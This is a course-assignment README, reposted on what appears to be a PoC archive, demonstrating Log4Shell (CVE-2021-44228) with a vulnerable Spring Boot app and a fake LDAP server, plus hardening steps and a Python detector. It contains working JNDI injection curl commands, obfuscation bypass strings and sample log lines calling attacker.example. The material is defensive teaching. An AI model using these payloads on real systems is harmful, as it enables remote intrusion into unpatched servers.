Related vulnerability
Description
Log4Shell (CVE-2021-44228) exploit demo for SEAS 8405. Includes a vulnerable Spring Boot app, fake LDAP server, Docker setup, MITRE mapping, incident response, and a full screen recording.
Introduction
# Homework 9 – Securing Systems Against Log4Shell Exploits
## Overview
This project demonstrates the exploitation and mitigation of the Log4Shell vulnerability (CVE-2021-44228) using a Dockerized Java web application with vulnerable Log4j 2.14.1. The setup also includes a simulated malicious LDAP server to demonstrate the JNDI injection attack path.
After exploitation, the system is hardened by upgrading Log4j, validating input, and applying MITRE D3FEND and ATT&CK recommendations.
---
## Folder Structure
```
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
```
---
## How to Run
### 1. Build the Java App (with vulnerable Log4j)
```bash
docker build -t vulnerable-app .
```
### 2. Run the App with Docker Compose
```bash
docker-compose up
```
The app will be listening at:
http://localhost:8080
### 3. Start the Fake LDAP Server (in a new terminal)
```bash
python3 ldap_server.py
```
### 4. Simulate an Exploit
Send a request like this to the app. Single-quote the URL: unquoted, bash tries to expand `${jndi:...}` itself as a parameter substitution and the request never carries the payload.
```bash
curl 'http://localhost:8080/?input=${jndi:ldap://localhost:8000/Exploit}'
```
If the embedded Tomcat answers `400 Bad Request` because of the unencoded braces in the query string, let curl percent-encode the parameter instead:
```bash
curl -G --data-urlencode 'input=${jndi:ldap://localhost:8000/Exploit}' http://localhost:8080/
```
The fake LDAP server should then receive a connection: the controller logged the parameter, Log4j 2.14.1 evaluated the `${jndi:...}` lookup inside the message, and the JVM opened a connection to the LDAP URL. That outbound callback is what the demo is looking for, and the fake server does not have to answer for it to be visible. Whether a real attacker turns this into code execution depends on what the LDAP server returns and on JVM settings such as `com.sun.jndi.ldap.object.trustURLCodebase` (false by default since JDK 8u191).
Mind the address in the payload: if the app runs in a container on the default bridge network, `localhost:8000` inside the container is the container itself, not the host where `ldap_server.py` is running. Point the lookup at an address the container can reach (the host's IP, or `host.docker.internal` on Docker Desktop), or run the LDAP server on the same compose network.
---
## How It’s Hardened
After demonstrating the attack, the system was secured by:
- Upgrading Log4j to version 2.17.0. This is the actual fix: lookups are no longer evaluated inside log messages and the JNDI lookup is restricted, which closes CVE-2021-44228 and its follow-ups CVE-2021-45046 and CVE-2021-45105.
- Input validation (blocking `${jndi:...}` patterns). Treat this as defence in depth only: the lookup syntax can be nested and case-folded (for example `${${lower:j}ndi:...}` or `${${::-j}ndi:...}`), so a literal-string block is easy to bypass.
- Disabling message lookups in configuration. On Log4j 2.10 through 2.14.1 this is `-Dlog4j2.formatMsgNoLookups=true` or `%m{nolookups}` in the pattern layout; 2.15.0 and later do not evaluate message lookups by default. This alone proved incomplete in some non-default configurations (CVE-2021-45046), which is why the upgrade comes first.
- Docker isolation to limit scope. It limits what a successful payload can reach on the host; it does not stop the outbound JNDI connection unless egress from the container is also restricted.
- MITRE D3FEND & ATT&CK techniques applied
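To make the point about the input-validation step concrete, the script below is an added example (not code from the repository) that checks request parameters or access-log lines for a JNDI lookup after undoing the tricks that defeat a literal `${jndi:` match: nested `lower`/`upper` lookups, the `${...:-default}` default-value syntax, and percent-encoding. It emulates only as much of Log4j 2 lookup resolution as an attacker relies on to assemble the string `jndi:`; the log lines are constructed for the example, and the host name in them is a placeholder.

```python
"""
Added example (not code from the repository): detect Log4j 2 JNDI lookups in
request parameters or access-log lines after undoing the obfuscation that
defeats a literal "${jndi:" blocklist. Detection only; the durable fix is the
Log4j upgrade. SAMPLE_LOG below is CONSTRUCTED, not taken from the project.
"""
import re
from urllib.parse import unquote

# An innermost ${...}: a lookup whose body contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Log4j's Interpolator matches the lookup prefix case-insensitively.
_JNDI = re.compile(r"^jndi:", re.IGNORECASE)

def _resolve(body: str) -> str:
    """
    Emulate how Log4j resolves one innermost lookup, as far as an attacker
    relies on it to build the string "jndi:":
      ${anything:-default}      -> default   (${::-j} -> "j", ${env:NOPE:-j} -> "j")
      ${lower:X} / ${upper:X}   -> case-folded X
      other prefixes, no default -> ""       (value unknown at the edge)
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    p = prefix.lower()
    if p == "lower":
        return arg.lower()
    if p == "upper":
        return arg.upper()
    return ""

def is_jndi_lookup(text: str, max_rounds: int = 64) -> bool:
    """True if text contains a ${jndi:...} lookup once nested lookups are resolved."""
    s = text
    for _ in range(max_rounds):
        m = _INNER.search(s)
        if not m:
            return False
        if _JNDI.match(m.group(1)):
            return True
        # Replace the innermost lookup with its value and look again.
        s = s[:m.start()] + _resolve(m.group(1)) + s[m.end():]
    return True   # absurd nesting depth: treat as hostile rather than give up

def normalize(text: str) -> str:
    """Undo up to two layers of percent-encoding, as payloads appear in access logs."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_log(lines) -> list:
    """Return (line_number, line) for every line carrying a JNDI lookup."""
    return [(i, ln) for i, ln in enumerate(lines, 1) if is_jndi_lookup(normalize(ln))]

def naive_hits(lines) -> int:
    """What a literal "${jndi:" block (the README's validation step) would have caught."""
    return sum("${jndi:" in normalize(ln) for ln in lines)

# Constructed access-log lines. Lines 1-4 are Log4Shell payloads (the last three hide
# "${jndi:" with nesting, default-value syntax and percent-encoding); 5 and 6 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /?input=${jndi:ldap://attacker.example:8000/Exploit} HTTP/1.1" 200',
    '10.0.0.5 - - "GET /?input=${${lower:j}ndi:${lower:l}dap://attacker.example/a} HTTP/1.1" 200',
    '10.0.0.5 - - "GET /?input=${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a} HTTP/1.1" 200',
    '10.0.0.5 - - "GET /?input=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200',
    '10.0.0.7 - - "GET /?input=hello%20world HTTP/1.1" 200',
    '10.0.0.8 - - "GET /?input=price%20is%20${amount}%20USD HTTP/1.1" 200',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    print(f"normalized detector: {len(hits)} of {len(SAMPLE_LOG)} lines flagged")
    print(f"literal '${{jndi:' check: {naive_hits(SAMPLE_LOG)} flagged")
    for n, line in hits:
        print(f"  line {n}: {line}")
```

On the sample the literal check flags one of the four payloads while the normalizing detector flags all four and neither benign line. The same resolution step is why a request filter that only strips `${jndi:` buys little time against a motivated attacker, and why the version upgrade is the control that actually closes the bug.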
---
## MITRE Mapping
### MITRE ATT&CK:
- T1190: Exploit Public-Facing Application
- T1210: Exploitation of Remote Services
### MITRE D3FEND:
- D3-IA: Input Validation
- D3-HI: Host-based Intrusion Detection
- D3-DA: Disable Unsafe Features
---
## Report
See the mitigation report PDF (named `mitigation_report.pdf` in this README; the snapshot below ships it as `Rivas_SEAS8405_Assignment_9_Report.pdf`) for:
- System architecture before/after
- Explanation of Log4Shell
- Mitigation strategy
- Incident response plan
---
## Screen Recording
If the video is not uploaded directly, it is available at the link in the report.
---
## Author
**Serpil Rivas**
SEAS 8405 – Cybersecurity Architectures
May 2025
File snapshot
[4.0K] /data/pocs/3f55c353215d113e70869425385dc2e9b3d45bc2
├── [1.3M] Architecture-Diagram.png
├── [ 135] docker-compose.yml
├── [ 244] Dockerfile
├── [ 613] ldap_server.py
├── [1.6K] pom.xml
├── [2.2K] README.md
├── [2.0M] Rivas_SEAS8405_Assignment_9_Report.pdf
├── [4.0K] Screenshots
│ ├── [114K] Screen1.png
│ ├── [147K] screen2.png
│ ├── [139K] screen3.png
│ └── [192K] Screen 4.png
├── [4.0K] src
│ └── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ ├── [ 328] Log4ShellDemoApplication.java
│ └── [ 567] LogController.java
└── [4.0K] target
├── [4.0K] classes
│ └── [4.0K] com
│ └── [4.0K] example
│ ├── [ 750] Log4ShellDemoApplication.class
│ └── [1.5K] LogController.class
├── [ 18M] log4shell-demo-0.0.1-SNAPSHOT.jar
├── [3.2K] log4shell-demo-0.0.1-SNAPSHOT.jar.original
├── [4.0K] maven-archiver
│ └── [ 69] pom.properties
└── [4.0K] maven-status
└── [4.0K] maven-compiler-plugin
└── [4.0K] compile
└── [4.0K] default-compile
├── [ 75] createdFiles.lst
└── [ 193] inputFiles.lst
15 directories, 20 files
Notes
1. Accessing the original source is recommended where possible.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of this POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.